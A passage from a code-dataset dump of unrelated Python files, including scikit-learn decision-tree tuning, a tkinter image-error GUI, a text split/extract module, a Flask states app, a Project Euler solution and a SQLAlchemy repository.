and annee % 100 != 0):\r\n    result = \"true\"\r\n\r\nif result == \"true\":\r\n    print(\"The year is a leap year\")\r\nelse:\r\n    print(\"The year is not a leap year\")\r\n\r\n\r\n","sub_path":"TP_Annebisixtile_v1.py","file_name":"TP_Annebisixtile_v1.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"91801145","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.model_selection import validation_curve\nfrom sklearn.metrics import confusion_matrix\n\nimport time\nimport pandas as pd\nfrom sklearn.model_selection import GridSearchCV\nimport warnings\n\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None, n_jobs=None, train_sizes=np.linspace(0.2,1.0,10)):\n    plt.figure()\n    plt.title(title)\n    if ylim is not None:\n        plt.ylim(*ylim)\n    plt.xlabel(\"Training examples\")\n    plt.ylabel(\"Score\")\n    train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n    train_scores_mean = np.mean(train_scores, axis=1)\n    train_scores_std = np.std(train_scores, axis=1)\n    test_scores_mean = np.mean(test_scores, axis=1)\n    test_scores_std = np.std(test_scores, axis=1)\n    print('cross-validation scores', test_scores_mean)\n    plt.grid()\n\n    plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color=\"b\")\n    plt.fill_between(train_sizes, test_scores_mean - test_scores_std,test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n    plt.plot(train_sizes, train_scores_mean, 'o-', color=\"b\", label=\"Training score\")\n    plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\", label=\"Cross-validation score\")\n\n    plt.legend(loc=\"best\")\n    plt.show()\n    return plt\n\n\ndef plot_validation_curve(X,y,estimator,name):\n\n    if name == 'dtree':\n        param_range = np.arange(1, 100,5)\n        param_name = 'max_depth'\n    if name == 'dtree1':\n        param_range = np.arange(2,35,2)\n        param_name = 'min_samples_split'\n    # if name == 'dtree2':\n    #     param_range = np.arange(2,40,2)\n    #     param_name = 'min_samples_leaf'\n    if name == 'dtree3':\n        param_range = np.arange(70,350,40)\n        param_name = 'max_leaf_nodes'\n\n    train_scores, test_scores = validation_curve(estimator, X, y, param_name=param_name, param_range=param_range, cv=5,\n                                                 scoring=\"accuracy\", n_jobs=1)\n    train_scores_mean = np.mean(train_scores, axis=1)\n    train_scores_std = np.std(train_scores, axis=1)\n    test_scores_mean = np.mean(test_scores, axis=1)\n    test_scores_std = np.std(test_scores, axis=1)\n\n    plt.title(\"Validation Curve for \" + name)\n    plt.xlabel(param_name)\n    plt.ylabel(\"Score\")\n    plt.ylim(0.0, 1.1)\n    plt.grid()\n    lw = 2\n    plt.plot(param_range, train_scores_mean, label=\"Training score\", 
color=\"darkorange\", lw=lw)\n plt.fill_between(param_range, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.2,\n color=\"darkorange\", lw=lw)\n plt.plot(param_range, test_scores_mean, label=\"Cross-validation score\", color=\"navy\", lw=lw)\n plt.fill_between(param_range, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.2,\n color=\"navy\", lw=lw)\n plt.legend(loc=\"best\")\n plt.show()\n\n\ndf = pd.read_csv('digits_training.tra', sep=\",\", skiprows=0)\n\ndf=np.array(df)\nprint(df.shape,df.dtype)\ndat=df[:,0:64]\ntar1=df[:,64]\nX=dat\ny=tar1\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=7)\n# clf=DecisionTreeClassifier(max_depth=5,min_samples_split=10,max_leaf_nodes=50)#random search\nclf= DecisionTreeClassifier()\ns1=time.time()\nclf.fit(X_train,y_train)\ne1=time.time()\n# s2=time.time()\n# y_prd=clf.predict(X_test)\n# e2=time.time()\nt1=e1-s1\n# t2=e2-s2\ny_test = np.array(y_test)\n#y_prd = np.array(y_prd)\nprint(clf.get_depth(),clf.get_n_leaves())\n#print('Test Accuracy: %.8f' % accuracy_score(y_test,y_prd))\nprint(\"Training time: \",t1)\n# print(\"Testing time: \",t2)\nplot_learning_curve(clf,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)\n# plot_tree(clf.fit(X_train, y_train),filled=True)\n# plt.show()\nclf1=DecisionTreeClassifier()\nplot_validation_curve(X_train,y_train,clf1,'dtree')\nplot_validation_curve(X_train,y_train,clf1,'dtree1')\n#plot_validation_curve(X_train,y_train,clf1,'dtree2')\nplot_validation_curve(X_train,y_train,clf1,'dtree3')\n# clf2=DecisionTreeClassifier(max_depth=5,min_samples_split=10,max_leaf_nodes=50)\n#\n# plot_learning_curve(clf2,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)\n# clf2.fit(X_train,y_train)\n# e1=time.time()\n# s2=time.time()\n# y_prd=clf2.predict(X_test)\n# e2=time.time()\n# t1=e1-s1\n# t2=e2-s2\n# y_test = np.array(y_test)\n# y_prd = np.array(y_prd)\n# print('Test Accuracy: %.8f' % accuracy_score(y_test,y_prd))\n# plot_tree(clf2.fit(X_train, y_train),filled=True)\n# plt.show()\n\nclf3=DecisionTreeClassifier()\nclf3=GridSearchCV(estimator=clf3,param_grid={'max_depth': np.arange(10,16,2),'max_leaf_nodes':np.arange(220,280,10)},cv=5)\nx1=time.time()\nclf3.fit(X_train,y_train)\nx2=time.time()\nprint(x2-x1,\"train time\")\n# # plot_tree(clf1.fit(X_train, y_train),filled=True)\n# # plt.show()\nx11=time.time()\ny_prd1=clf3.predict(X_test)\nx21=time.time()\nprint(x21-x11,\"test time\")\ny_prd1 = np.array(y_prd1)\nprint('Test Accuracy after grid search fit: %.8f' % accuracy_score(y_test,y_prd1))\nprint(clf3.best_params_,clf3.best_score_)\n# plot_learning_curve(clf3,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)\n###########################################################\nclf = DecisionTreeClassifier(max_depth=14,max_leaf_nodes=260,random_state=0)\npath = clf.cost_complexity_pruning_path(X_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\nclfs = []\nfor ccp_alpha in ccp_alphas:\n clf = DecisionTreeClassifier(max_depth=14,max_leaf_nodes=260,random_state=0, ccp_alpha=ccp_alpha)\n clf.fit(X_train, y_train)\n clfs.append(clf)\nprint(\"Number of nodes in the last tree is: {} with ccp_alpha: {}\".format(\n clfs[-1].tree_.node_count, ccp_alphas[-1]))\ntrain_scores = [clf.score(X_train, y_train) for clf in clfs]\ntest_scores = [clf.score(X_test, y_test) for clf in clfs]\n\nfig, ax = 
plt.subplots()\nax.set_xlabel(\"alpha\")\nax.set_ylabel(\"accuracy\")\nax.set_title(\"Accuracy vs alpha for training and testing sets\")\nax.plot(ccp_alphas, train_scores, marker='o', label=\"train\",\n drawstyle=\"steps-post\")\nax.plot(ccp_alphas, test_scores, marker='o', label=\"test\",\n drawstyle=\"steps-post\")\nax.legend()\nplt.show()\nclf = DecisionTreeClassifier(max_depth=14,max_leaf_nodes=260,random_state=0, ccp_alpha=0.001)\nclf.fit(X_train, y_train)\nprint(clf.score(X_test, y_test),'score')\nprint(clf.get_depth(),clf.get_n_leaves())\nplot_learning_curve(clf,'Learning Curve for Decision Tree', X_train, y_train, (0,1.01),cv=5)","sub_path":"dt.py","file_name":"dt.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376945977","text":"import matplotlib\nmatplotlib.use(\"TkAgg\") # Fixes error on OSX\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter.filedialog import askdirectory\nimport os\nimport re\nfrom pathlib import Path\nfrom PIL import Image, ImageTk\nfrom FindErrors import find_errors\nfrom skimage import io\nfrom skimage.external import tifffile\nfrom skimage.draw import line\n\n\nclass Main(Tk):\n def __init__(self):\n Tk.__init__(self)\n self.title(\"Find Errors\")\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n mainframe = ttk.Frame(self, padding=\"10\")\n mainframe.grid(sticky=(N, W, E, S))\n mainframe.rowconfigure(1, weight=1, pad=5, minsize=50)\n mainframe.rowconfigure(3, pad=10)\n mainframe.columnconfigure(0, minsize=200)\n mainframe.columnconfigure(2, pad=5)\n mainframe.columnconfigure(4, weight=1)\n\n self.count = 0\n self.process = StringVar()\n self.process.set('None')\n self.bit_change = IntVar()\n self.bit_depth = IntVar()\n self.bit_var = 0\n self.otsu = IntVar()\n self.high = StringVar()\n self.low = StringVar()\n self.high.set(.9)\n self.low.set(.4)\n self.otsu.set(1)\n\n ttk.Label(mainframe, text=\"Processing:\").grid(row=2, column=0, sticky=(W, S))\n ttk.Label(mainframe, textvariable=self.process).grid(row=2, column=1, sticky=S)\n\n self.files = []\n ttk.Button(mainframe, text=\"Select Directory\", command=self.change_directory).grid(row=0, column=0, sticky=W)\n\n ttk.Button(mainframe, text=\"Options\", command=self.pref).grid(row=0, column=1, sticky=E)\n\n fileframe = ttk.Labelframe(mainframe, text='Files:')\n fileframe.rowconfigure(0, pad=50)\n fileframe.grid(row=1, column=0, columnspan=2, sticky=(N, W, S, E))\n fileframe.grid_propagate(0)\n self.file_strings = StringVar()\n ttk.Label(fileframe, textvariable=self.file_strings).grid()\n\n ttk.Button(mainframe, text=\"Run\", command=self.go).grid(row=1, column=2)\n ttk.Button(mainframe, text=\"Next\", command=self.next_img).grid(row=1, column=3)\n\n canvasframe = ttk.Labelframe(mainframe)\n canvasframe.grid(row=1, column=4, rowspan=2, sticky=(N, W, S, E))\n canvasframe.rowconfigure(0, weight=1)\n canvasframe.columnconfigure(0, weight=1)\n\n xscrollbar = Scrollbar(canvasframe, orient=HORIZONTAL)\n xscrollbar.grid(row=1, column=0, sticky=(E, W))\n\n yscrollbar = Scrollbar(canvasframe)\n yscrollbar.grid(row=0, column=1, sticky=(N, S))\n\n self.canvas = Canvas(canvasframe, xscrollcommand=xscrollbar.set, yscrollcommand=yscrollbar.set)\n self.img_on_canvas = self.canvas.create_image(0, 0, anchor='nw')\n self.canvas.grid(row=0, column=0, sticky=(N, W, S, E))\n self.canvas.configure(scrollregion=self.canvas.bbox(ALL))\n\n xscrollbar.configure(command=self.canvas.xview)\n 
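        # Added note: each scrollbar's command drives the canvas view (xview/yview), while the canvas reports its position back through the xscrollcommand/yscrollcommand callbacks wired up above (Tk's standard two-way scroll binding).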
yscrollbar.configure(command=self.canvas.yview)\n\n self.to_display = []\n self.images = []\n\n self.progress = ttk.Progressbar(mainframe, orient=HORIZONTAL, mode='determinate')\n self.progress.grid(row=3, column=0, columnspan=5, sticky=(E, W))\n\n def change_directory(self):\n self.files = []\n folder = askdirectory()\n for f in os.listdir(folder):\n if re.search('(?i)\\.jpg', f):\n self.files.append(str(Path(folder+\"\\\\\"+f).resolve()))\n self.file_strings.set('\\n'.join(self.files))\n self.count = 0\n\n def go(self):\n self.progress['maximum'] = len(self.files)\n self.progress['value'] = 0\n self.to_display = []\n for n, f in enumerate(self.files):\n self.process.set(f)\n self.update_idletasks()\n self.to_display.append([])\n try:\n self.to_display[n].append(find_errors(f, self.bit_var, self.otsu.get(), float(self.high.get()),\n float(self.low.get())))\n except:\n raise\n self.progress['value'] += 1\n self.process.set('Rendering')\n # DONT TRY AND DISPLAY\n # for n, i in enumerate(self.files):\n # image = io.imread(i)\n # for j in self.to_display[n]:\n # for k in j:\n # p0, p1 = k\n # rr, cc = line(p0[0], p0[1], p1[0], p1[1])\n # image[rr, cc] = 255\n # self.images.append(image)\n self.process.set('None')\n self.count = 1\n\n def next_img(self):\n if not self.count:\n pass\n else:\n if self.count > len(self.images):\n self.count = 1\n img = ImageTk.PhotoImage(Image.fromarray(self.images[self.count - 1]))\n self.canvas.itemconfig(self.img_on_canvas, image=img)\n self.canvas.img = img\n self.count += 1\n\n def pref(self):\n pref_win = Toplevel()\n pref_win.transient(self)\n pref_win.grab_set()\n pref_frame = ttk.Frame(pref_win, padding=\"10\")\n pref_frame.grid(sticky=(N, W, E, S))\n bit_spin = Spinbox(pref_frame, from_=1, to=16, textvariable=self.bit_depth,\n command=self.bit_var_change)\n if not self.bit_change.get():\n bit_spin['state'] = DISABLED\n bit_spin.grid(row=0, column=1, columnspan=2)\n ttk.Checkbutton(pref_frame, text=\"Reduce bit depth by\", variable=self.bit_change,\n command=lambda: self.swap_state(bit_spin)).grid(row=0, column=0, sticky=W)\n ttk.Radiobutton(pref_frame, text=\"Use Otsu's method to determine\\nCanny thresholds (ratio between 0 - 1)\",\n variable=self.otsu, value=1).grid(row=1, column=0, sticky=W)\n ttk.Radiobutton(pref_frame, text=\"Set Canny thresholds manually (0 - 255)\",\n variable=self.otsu, value=0).grid(row=2, column=0, sticky=W)\n self.otsu.set(1)\n ttk.Label(pref_frame, text='Upper threshold').grid(row=1, column=1, sticky=W)\n ttk.Entry(pref_frame, width=3, textvariable=self.high).grid(row=1, column=2, sticky=W)\n ttk.Label(pref_frame, text='Lower threshold').grid(row=2, column=1, sticky=W)\n ttk.Entry(pref_frame, width=3, textvariable=self.low).grid(row=2, column=2, sticky=W)\n\n def bit_var_change(self):\n self.bit_var = self.bit_depth.get()\n\n def swap_state(self, widget):\n if widget['state'] == NORMAL:\n widget['state'] = DISABLED\n self.bit_var = 0\n else:\n widget['state'] = NORMAL\n self.bit_var = self.bit_depth.get()\n\n\nif __name__ == \"__main__\":\n Main().mainloop()\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"65410424","text":"from map import Map\nimport re\nclass Split(Map):\n\tdef __init__(self):\n\t\tsuper(Split,self).__init__()\n\t\tself['update'] = False\n\t\tself['drop'] = True\n\t\tself['result'] = 'column'\n\t\tself.name = 'split'\n\n\tdef transform(self, 
values):\n\t\t\n\t\tval = str(values[0])\n\t\t\n\t\t\n\t\tif(not val):\n\t\t\treturn []\n\n\t\tmax_splits = self['max'];\n\t\t\n\n\n\t\t#Shortcut for big splits\n\t\tif(max_splits==0 and self['on']!=None and self['before']==None and self['after']==None and self['ignore_between'] == None):\n\t\t\t\treturn re.split(self['on'], val)\n\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tsplits = match(val, {'on':self['on'],'before':self['before'],'after':self['after'],'ignore_between':self['ignore_between'], 'max':self['max']})\n\t\t\n\t\tsplitValues = []\n\t\t\n\n\t\tfor i in range(0,len(splits)):\n\t\t\tif(i%2==0):\n\t\t\t\tsplitValues.append(splits[i])\n\t\t\n\n\n\t\t\n\t\treturn splitValues;\n\t\t\nclass Extract(Map):\n\tdef __init__(self):\n\t\tsuper(Extract,self).__init__()\n\t\tself['update'] = False\n\t\tself['drop'] = False\n\t\tself['result'] = 'column'\n\t\tself.name = 'extract'\n\n\tdef transform(self, values):\n\n\t\tval = str(values[0])\n\t\tsplits = match(val, {'on':self['on'],'before':self['before'],'after':self['after'],'ignore_between':self['ignore_between'], 'max':self['max']})\n\n\t\tsplitValues = []\n\t\t\n\t\tfor i in range(0,len(splits)):\n\t\t\tif(i%2==1):\n\t\t\t\tsplitValues.append(splits[i])\n\n\n\t\treturn splitValues;\t\t\n\nclass Cut(Map):\n\tdef __init__(self):\n\t\tsuper(Cut,self).__init__()\n\t\tself['update'] = True\n\t\tself['drop'] = False\n\t\tself['result'] = 'column'\n\t\tself.name = 'cut'\n\n\tdef transform(self, values):\n\n\t\tsplitValues = []\n\t\tfor i in range(0, len(values)):\n\t\t\tv = values[i]\n\t\t\tval = str(v)\n\t\t\tsplits = match(val, {'on':self['on'],'before':self['before'],'after':self['after'],'ignore_between':self['ignore_between'], 'max':self['max']})\n\n\t\t\n\t\t\tx = ''\n\t\t\tfor i in range(0,len(splits)):\n\t\t\t\tif(i%2==0):\n\t\t\t\t\tx += (splits[i])\n\t\t\t\n\t\t\tsplitValues.append(x)\n\n\t\treturn splitValues;\t\t\n\n\n\t\t\n\t\t\n\t\t\n\t\t\n\ndef match(value, options):\n\n\n\t\t\n\n\tif(not value):\n\t\treturn []\n\t\n\tmax_splits = options['max'];\n\n\tif(max_splits==None):\n\t\tmax_splits = 1\n\n\t#Shortcut for big splits\n\tif(options['on']!=None and options['before']==None and options['after']==None and options['ignore_between'] == None):\n\t\tif(max_splits==0):\n\t\t\treturn re.split(\"(\" + options['on'] + \")\", value)\n\n\n\tremainder_to_split = value\n\tsplits = []\n\tnumSplit = 0;\n\twhile(max_splits <= 0 or numSplit < max_splits*1):\n\t\ts = match_once(remainder_to_split, options)\n\n\t\tif(len(s) > 1):\n\t\t\tremainder_to_split = s[2];\n\t\t\tsplits.append(s[0])\n\t\t\tsplits.append(s[1])\n\t\t\toccurrence = 0\n\t\telse:\n\t\t\tbreak\n\t\t\t\n\t\tnumSplit+=1\n\t\n\tsplits.append(remainder_to_split)\n\toccurrence = 0\n\tnewSplits = []\n\tprefix = ''\n\twhich = 1\n\tfor i in range(0, len(splits)):\n\t\tif(i%2==1):\n\t\t\toccurrence+=1\n\t\t\tif(occurrence==which):\n\t\t\t\tnewSplits.append(prefix)\n\t\t\t\tnewSplits.append(splits[i])\n\t\t\t\toccurrence = 0\n\t\t\t\tprefix = ''\n\t\t\t\tcontinue\n\n\t\tprefix += splits[i]\n\n\tnewSplits.append(prefix)\n\t\n\treturn newSplits;\n\t\ndef match_once(value, options):\n\t\n\tsplits = []\n\t\n\ton = options['on']\n\tbefore = options['before']\n\tafter = options['after']\n\tignore_between = options['ignore_between']\n\t\n\tremainder = value\n\tremainder_offset = 0\n\tstart_split_offset = 0\n\tadd_to_remainder_offset = 0;\n\t\n\twhile(len(remainder)):\n\n\t\tvalid_split_region = remainder;\n\t\tvalid_split_region_offset = 0;\t\t\n\t\tstart_split_offset = 
remainder_offset;\n\t\tif(ignore_between):\n\t\t\tmatch = re.search(ignore_between, remainder);\n\t\t\tif(match):\n\t\t\t\tvalid_split_region = valid_split_region[0:match.start(0)]\n\t\t\t\tremainder_offset += match.start(0) + len(match.group(0));\n\t\t\t\tremainder = remainder[match.start(0)+len(match.group(0)):]\n\t\t\telse:\n\t\t\t\tremainder = ''\n\t\telse:\n\t\t\tremainder = ''\n\t\n\t\tif(after):\n\t\t\tmatch = re.search(after, valid_split_region)\n\t\t\tif(match):\n\t\t\t\tvalid_split_region_offset = match.start(0)+len(match.group(0));\n\t\t\t\tvalid_split_region = valid_split_region[valid_split_region_offset:]\n\t\t\telse:\n\t\t\t\tcontinue;\n\t\tif(before):\n\t\t\tmatch = re.search(before, valid_split_region)\n\t\t\tif(match):\n\t\t\t\tvalid_split_region = valid_split_region[0:match.start(0)]\n\t\t\telse:\n\t\t\t\tcontinue;\n\t\t\n\t\t\n\t\tmatch = re.search(on, valid_split_region)\n\t\t\n\t\tif(match):\n\t\t\tsplit_start = start_split_offset + valid_split_region_offset+match.start(0);\n\t\t\tsplit_end = split_start + len(match.group(0));\n\n\t\t\tsplits.append(value[0:split_start]);\n\t\t\tsplits.append(value[split_start:split_end])\t\t\t\n\t\t\tsplits.append(value[split_end:])\n\t\t\treturn splits;\n\n\t\telse:\t\n\t\t\tcontinue;\n\t\n\n\n\treturn [{'start':0, 'end':len(value), 'value':value}]\t","sub_path":"runtime/python/wrangler/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"469312521","text":"# Filling NaN values\n\nimport pandas as pd\n\ndf = pd.read_csv('D:\\\\Varun\\\\python_practice\\\\pandas_practice\\\\dirtydata.csv')\n\ndf1 = df[\"Calories\"].fillna(130)\n# or df.Calories = df[\"Calories\"].fillna(130)\nprint(df1.to_string())\n\n# Can fill in values of mean, median or mode of that column into the empty cell.\nx = df[\"Calories\"].mean()\ny = df[\"Calories\"].median()\nprint(x,y)\n\ndf2 = df[\"Calories\"].fillna(x)\nprint(df2.to_string())\n\ndf3 = df[\"Calories\"].fillna(y)\nprint(df3.to_string())\n\n# If you want entire dataframe, use inplace = True and print that","sub_path":"pandas_practice/basic5.2_clean.py","file_name":"basic5.2_clean.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"368579113","text":"def solve(wires):\r\n    wires.sort(key = lambda x: x[0])\r\n    s = 0\r\n    for i in range(len(wires)):\r\n        for k in range(i):\r\n            if (wires[i][1] < wires[k][1]):\r\n                s += 1\r\n    return s\r\n    \r\nt = int(input())\r\nfor i in range(1, t + 1):\r\n    n = int(input())\r\n    wires = []\r\n    for j in range(n):\r\n        wires.append([int(x) for x in input().split(' ')])\r\n    print(\"Case #{}: {}\".format(i,solve(wires)))\r\n","sub_path":"2010/1C/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"636908286","text":"#!/usr/bin/python3\n\"\"\"Script that starts a Flask web application\n\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models.state import State\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef handle_teardown(self):\n    \"\"\"Function\"\"\"\n    storage.close()\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef list_of_states():\n    \"\"\"Function\"\"\"\n    states = storage.all(State).values()\n    return render_template(\n        \"9-states.html\", states=states, 
condition=\"states_list\")\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef list_of_states_id(id):\n \"\"\"Function\"\"\"\n states = storage.all(State)\n # primero verificar que se pase el id\n if id:\n key = \"State.\" + id\n # luego verificar que key(State.421a5..) esté en el diccionario\n if key in states:\n state_id = states[key]\n return render_template(\n \"9-states.html\", state_id=state_id, condition=\"state_id\")\n else:\n return render_template(\n \"9-states.html\", condition=\"not_found\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"40538464","text":"'''\nTake the number 192 and multiply it by each of 1, 2, and 3:\n\n 192 x 1 = 192\n 192 x 2 = 384\n 192 x 3 = 576\n\nBy concatenating each product we get the 1 to 9 pandigital, 192384576. We will call 192384576 the concatenated product of 192 and (1,2,3)\n\nThe same can be achieved by starting with 9 and multiplying by 1, 2, 3, 4, and 5, giving the pandigital, 918273645, which is the concatenated product of 9 and (1,2,3,4,5).\n\nWhat is the largest 1 to 9 pandigital 9-digit number that can be formed as the concatenated product of an integer with (1,2, ... , n) where n > 1?\n'''\n\ndef unique_digits(number):\n\tdigits = {}\n\tfor digit in str(number):\n\t\tif digit in digits.keys():\n\t\t\treturn False\n\t\telse: digits[digit] = 1\n\treturn True\n\ndef pandigital(number):\n\tdigits = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\n\tfor digit in digits:\n\t\tif digit not in str(number):\n\t\t\treturn False\n\treturn True\t\n\t\ncandidates = set()\nfor i in range(1, 10000):\n\tc = str(i)\n\tn = 2\n\twhile unique_digits(c):\n\t\tc += str(i*n)\n\t\tif len(c) > 9:\n\t\t\tbreak\n\t\telif len(c) == 9 and pandigital(int(c)):\n\t\t\tcandidates.add(c)\n\t\t\tbreak\n\t\telse: n += 1\n\t\nprint('Answer:', max(candidates))\n","sub_path":"038.py","file_name":"038.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"183644352","text":"#!/bin/env python\n#\n# Copyright 2008\n# by\n# The Board of Trustees of the\n# Leland Stanford Junior University.\n# All rights reserved.\n#\n\n__facility__ = \"Online\"\n__abstract__ = \"Timing config reporting classes\"\n__author__ = \"P.A.Hart SLAC - GLAST LAT I&T/Online\"\n__date__ = \"2008/01/25 00:00:00\"\n__updated__ = \"$Date: 2008/06/09 23:46:12 $\"\n__version__ = \"$Revision: 1.1 $\"\n__release__ = \"$Name: v1r10p2 $\"\n__credits__ = \"SLAC\"\n\nimport logging, os\n\nfrom ConfigXmlReport import *\n\nclass IgnoreXmlReport(PrecinctXmlReport):\n def __init__(self, precinctInfo, configData):\n PrecinctXmlReport.__init__(self, precinctInfo, configData)\n \n def createReport(self, rebuild=False):\n self.createHeader()\n summary = self.addSection(\"%s_Summary\" %(self.info.getPrecinct()))\n\n self.addIntent(summary) # blank intent node for later?\n\n\n \n \n","sub_path":"python/IgnoreXmlReport.py","file_name":"IgnoreXmlReport.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"473835245","text":"from common.database.models import Screen, ScreenNode, Test # common.database.models\nfrom common.database.repos.BaseRepo import BaseRepo\nfrom sqlalchemy.sql import text\nfrom app import 
db\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScreenRepo(BaseRepo):\n def __new__(cls): ## Singletone CTOR\n if not hasattr(cls, 'instance'):\n cls.instance = super(ScreenRepo, cls).__new__(cls)\n return cls.instance\n\n def _class(self):\n return Screen\n\n def getAllByTestRunId(self, _test_run_id):\n try:\n screens = Screen.query.filter_by(test_run_id=_test_run_id).all()\n except Exception as e:\n return None, e\n else:\n return screens, None\n\n def getAllByTestRunIdOrderAsc(self, _test_run_id):\n try:\n screens = Screen.query.filter_by(test_run_id=_test_run_id).order_by(Screen.id.asc()).all()\n except Exception as e:\n return None, e\n else:\n return screens, None\n\n def geByNameAndTestRunId(self, _name, _test_run_id):\n try:\n screen = Screen.query.filter_by(name=_name, test_run_id=_test_run_id).first()\n except Exception as e:\n return None, e\n else:\n return screen, None\n\n\n def getAllUniqueScreensByApplicationId(self, application_id):\n\n params = {\"application_id\": application_id}\n\n\n #Get The screens from the last autonomous test_run\n try:\n query = text(\"\"\"SELECT id, name, image_url, xml_dom, elements FROM screen where screen.test_run_id in\n (SELECT id from test_run\n WHERE test_run.autonomous=true\n and test_run.master_test=true\n and test_run.state='Completed'\n and test_run.test_id in (select tests.id from tests where tests.application_id=:application_id)\n ORDER BY test_run.id DESC LIMIT 1)\n union\n select id, name, image_url, xml_dom, elements from screen_node where id in\n (SELECT max(screen_node.id) as max_id -- screen_node.name as sname,\n FROM screen_node LEFT OUTER JOIN tests ON tests.id = screen_node.test_id\n WHERE tests.application_id=:application_id\n group by screen_node.name)\n and name not in\n (\n SELECT name FROM screen where screen.test_run_id in\n (SELECT id from test_run\n WHERE test_run.autonomous=true\n and test_run.master_test=true\n and test_run.state='Completed'\n and test_run.test_id in (select tests.id from tests where tests.application_id=:application_id)\n ORDER BY test_run.id DESC LIMIT 1)\n )\"\"\")\n results = db.engine.execute(query, params)\n logger.warning(\"Proxy column names {n}\".format(n=results._metadata.keys))\n except Exception as e:\n logger.warning(\"getAllUniqueScreensByApplicationId == Exception caught {ex}\".format(ex=e))\n return None, e\n\n\n #for i in results:\n #_id, _name, _image_url, _, _, _source, _xml_dom, _elements, _logs, _ = i\n #print(\"NAME OF SCR \", _name)\n\n\n\n \"\"\"\n Get all the unique screens by distinct name generate by\n all the autonomous test runs for any given application\n\n :param application_id: Int\n :return: ResultProxy object\n \"\"\"\n #params = {\"application_id\": application_id}\n ##with db.engine.connect() as con:\n '''\n try:\n statement = text(\"\"\"select * from screen where id in\n (SELECT max(screen.id) as max_id -- screen.name as sname,\n FROM screen LEFT OUTER JOIN test_run ON test_run.id = screen.test_run_id\n --select * from test_run\n WHERE test_run.autonomous=true\n and test_run.master_test=true\n and test_run.state='Completed'\n and test_run.test_id in (select tests.id from tests where tests.application_id=:application_id)\n group by screen.name)\"\"\")\n results = db.engine.execute(statement, params)\n logger.warning(\"Proxy column names {n}\".format(n=results._metadata.keys))\n except Exception as e:\n logger.warning(\"getAllUniqueScreensByApplicationId == Exception caught {ex}\".format(ex=e))\n return None, e\n\n '''\n\n return results, 
None\n\n\n","sub_path":"database/repos/ScreenRepo.py","file_name":"ScreenRepo.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45631073","text":"import numpy as np\nimport math\n\ndef accuracy(updated_rankings, seq, snapshot, method):\n # indices of the active nodes \n idx = np.where( seq[snapshot+1].clust_memb > 0 )[0]\n \n # ground truth to compare with\n if method == 'PageRank':\n ground_truth = np.array(seq[snapshot+1].pr.T[idx])\n elif method == 'GammaPageRank':\n ground_truth = np.array(seq[snapshot+1].gpr[idx])\n\n # rankings on the active nodes\n prediction = np.array(updated_rankings[idx])\n\n # error in magnitude\n err_mag = np.linalg.norm( ground_truth - prediction, ord=2 ) / np.linalg.norm( ground_truth, ord=2 )\n\n # error in angle\n err_deg = math.degrees( math.acos( np.dot(prediction.T, ground_truth) / (np.linalg.norm(ground_truth, ord=2)*np.linalg.norm(prediction, ord=2)) ) )\n\n return err_mag, err_deg\n","sub_path":"accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580048957","text":"import cv2\n\nsrc = cv2.imread(\"33.jpg\")\ngrayImg = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n\nfast = 